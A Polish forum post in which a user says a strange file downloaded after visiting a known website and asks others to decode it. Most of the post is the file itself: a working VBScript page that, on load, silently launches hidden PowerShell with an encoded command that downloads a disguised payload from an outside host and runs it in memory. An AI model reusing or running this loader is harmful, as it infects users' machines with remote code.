06.01.2020, 13:39
po wejsciu na znana strone sciagnął mi sie jakis dziwny plik z taka zawartością
[malware]
[/malware]
czy potrafi ktos to rozszyfrować ?
[malware]
Kod:
<html>
<head>
<script language="VBScript">
Sub window_onload
const impersonation = 3
Const HIDDEN_WINDOW = 12
Set Locator = CreateObject("WbemScripting.SWbemLocator")
Set Service = Locator.ConnectServer()
Service.Security_.ImpersonationLevel=impersonation
Set objStartup = Service.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
Set Process = Service.Get("Win32_Process")
Error = Process.Create("cmd.exe /c PowerShell.exe -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZwAuAHQAbwBwADQAdABvAHAALgBpAG8ALwBwAF8AMQA0ADYANgBoAGMAZwA3AHIAMQAuAGoAcABnACcAKQApACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=", null, objConfig, intProcessID)
window.close()
end sub
</script>
</head>
</html>
czy potrafi ktos to rozszyfrować ?